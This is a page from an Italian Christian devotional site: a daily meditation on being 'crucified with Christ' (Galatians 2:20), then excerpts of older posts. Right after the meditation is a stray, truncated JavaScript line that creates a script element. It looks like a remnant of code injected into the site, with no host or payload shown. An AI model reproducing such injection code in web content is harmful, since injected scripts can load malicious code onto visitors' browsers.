Meditazione del giorno: Crocifisso con Cristo

“Io sono stato crocifisso con Cristo” (Galati 2:20).

Il Signore Gesù Cristo compì l’opera Sua come nostro pubblico rappresentante, e la Sua morte sulla croce fu virtualmente la morte di tutto il Suo popolo. Allora tutti i Suoi santi hanno reso alla giustizia ciò che le era dovuto, avendo fatto espiazione verso la vendetta divina per tutti i loro peccati. Paolo, l’apostolo dei Gentili, si rallegrò nel pensare che come parte del popolo eletto di Cristo, anche lui era morto sulla croce in Cristo. Egli non si limitò a crederlo dottrinalmente, ma lo accettò con fiducia, riponendo la sua speranza in questo. Paolo credette che per la virtù della morte di Cristo, aveva soddisfatto la giustizia divina, e trovato riconciliazione con Dio.

Amati, che benedizione è quando l’anima può guardare alla croce di Cristo, e sentire: “sono morto; la legge mi ha ucciso, e perciò io sono libero dal suo potere, perché nella mia Certezza ho portato la maledizione, e nella persona del mio Sostituto tutto quello che la legge poteva fare, mediante la condanna, mi è stato inflitto, poiché io sono crocifisso con Cristo”.

Ma Paolo intendeva anche più di questo. Egli non credette soltanto nella morte di Cristo, riponendo fede in essa, ma sentì realmente la sua potenza che operava in lui per crocifiggere la sua vecchia natura corrotta. Quando egli vedeva i piaceri del peccato, diceva: “Non posso goderne: io sono morto ad essi”.
Tale è l’esperienza di ogni vero Cristiano. Avendo ricevuto Cristo, il credente è come definitavemente morto a questo mondo. Ma pur essendo cosciente di essere morto al mondo, egli può al tempo stesso esclamare con l’apostolo: “Ma io vivo”. Egli è realmente vivente davanti a Dio. La vita Cristiana è un enigma senza pari. Nessun uomo carnale può comprenderlo; neanche il credente stesso può farlo. Morto, eppure vivo! Crocifisso con Cristo, eppure allo stesso tempo risorto con Cristo in novità di vita! Essere unito al Salvatore sofferente e sanguinante, ed essere morto al mondo e al peccato, sono cose che rallegrano l’anima. Oh che noi possiamo vivere maggiormente in esse!
var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

TORNERA'!

di S. Carruthers  – (Leggendo le statistiche citate nell’articolo tenere presente che è stato scritto negli anni 70) Gesù, che non ha mai mentito, poiché è la verità per essenza, prima di lasciare questa terra, disse ai suoi discepoli: Ritornerò! E noi possiamo essere altrettanto sicuri della realtà del suo ritorno, come possiamo essere certi della realtà della sua prima venuta! Effettivamente, nella Sacra Scrittura ci sono assai …
Leggi Tutto

Chuck Norris, Walker Texas Ranger: È molto importante fare pace con Dio

Chuck Norris, ex campione di arte marziale ed attore di fama mondiale, ha girato più di 20 film e diverse serie televisive.  Chuck afferma che i veri uomini vivono per Cristo.  Nel suo ruolo di uomo di ferro nella nota serie televisiva “Walker Texas Ranger”, egli rappresenta colui che è pronto ad aiutare gli altri, ma nella sua vita privata sa di avere bisogno dell’aiuto che viene dall’alto.  In un’intervista alla …
Leggi Tutto

Vita Cristiana giorno per giorno.

di H. W. Smith- “O voi tutti che siete assetati, venite alle acque, e voi che non avete denaro venite, comprate, mangiate! Venite. comprate senza denaro, senza pagare, vino e latte! Perché spendete denaro per ciò che non è pane, e il frutto delle vostre fatiche per ciò che non sazia? Ascoltatemi attentamente e mangerete ciò che è buono, e l’anima vostra godrà di cibi succulenti! (Isaia 55:1?2) Nell’ambito della nostra esistenza …
Leggi Tutto

SE DIO NON OPERA CI STIAMO SFORZANDO INVANO

di  Stephen Witmer  –  Riuscire a capire la relazione tra la sovranità di Dio e la responsabilità umana è sempre stata una questione di semplice ricerca intellettuale per me – solo un sorprendente puzzle d’idee filosofiche. Ma adesso non lo è più.  Il frutto amaro della pigrizia, dell’ansia e dell’orgoglio si sono intrufolati nella mia vita ogni volta che sono caduto in questo equivoco e dall’altra parte della …
Leggi Tutto

LE COMPASSIONI DI DIO

di Agostino Masdea   –  E Gesù, sbarcato, vide una grande folla e ne ebbe compassione, perché erano come pecore senza pastore, e prese a insegnare loro molte cose. (Marco 6:34) La visione che si prospettò davanti al Signore quando discese dalla barca in questo passo dell’evangelo di Marco è simile a quella che si presenta davanti ai nostri occhi ogni giorno: folle immense di uomini che vanno e …
Leggi Tutto

Dove sei?

di D. L. Moody    –    La primissima cosa che accadde quando fu giunta in cielo la notizia della caduta dell’uomo, fu che Dio discese alla ricerca del perduto. Mentre Egli cammina attraverso il giardino nella brezza del giorno lo sentiamo chiamare: “Adamo! Adamo! Dove sei?”. Era la voce della grazia, della misericordia, e dell’amore. Dal momento che era Adamo il trasgressore, avrebbe dovuto essere lui a cercare …
Leggi Tutto

LA COSTANZA NELLA FEDE

di T. A. SPARKS   –  Poi Elia disse ad Acab: «Risali, mangia e bevi, poiché già si ode un rumore di grande pioggia». Acab risalì per mangiare e bere; ma Elia salì in vetta al Carmelo; e, gettatosi a terra, si mise la faccia tra le ginocchia, e disse al suo servo: «Ora va’ su, e guarda dalla parte del mare!» Quegli andò su, guardò, e disse: …
Leggi Tutto

LUTTO NATALIZIO

di Keith Green  –   Non dimenticherò mai la gioia incredibile del Natale e tutto ciò che mi aspettavo. La nostra casa addobbata, le luci colorate, l’odore particolare. Parenti e amici che venivano a trovarci… tutti con grandi. sorrisi e risate… e tutti con dei doni!! Quel periodo era pieno di vita, calore e voglia di dare. Sono i migliori ricordi della mia infanzia. L’aria, fuori, era fredda e …
Leggi Tutto

Dai nostri Culti